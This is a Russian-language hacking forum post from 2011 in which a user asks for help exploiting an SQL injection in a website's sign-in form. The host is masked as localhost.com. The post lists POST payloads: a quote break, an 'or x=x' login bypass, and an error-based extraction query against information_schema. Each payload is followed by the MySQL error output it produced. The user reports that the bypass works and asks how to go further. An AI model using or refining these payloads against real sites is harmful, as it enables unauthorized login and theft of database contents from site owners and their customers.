12.08.2011, 12:16
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
прошу помочь с скулем не могу раскрутит
Код:
https://localhost.com/account/signIn
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp'
There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''pppppp'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp'' AND (c.password is not null AND c.password != '')
Код:
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp' or 'x'='x'
There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''x'' AND (c.password is not null AND c.password != '')' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp' or 'x'='x'' AND (c.password is not null AND c.password != '')
Код:
POST
email=eeee%40eeeee.ee&signinfrom=private&password=pppppp+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+
There was an SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or(1,2)=(select+count(*),concat((select+version() +from+information_schema.tables' at line 4 - SELECT c.* FROM customer c WHERE c.email = 'eeee@eeeee.ee' AND c.password = 'pppppp'+or(1,2)=(select+count(*),concat((select+v ersion()+from+information_schema.tables+limit+0,1) ,0x3a,floor(rand()*2))+from+information_schema.tab les+group+by+2+limit+0,1)--+' AND (c.password is not null AND c.password != '')
тока email=eeee%40eeeee.ee&signinfrom=private&password= pppppp' or 'x'='x норм отображается но order by не катет |
|
|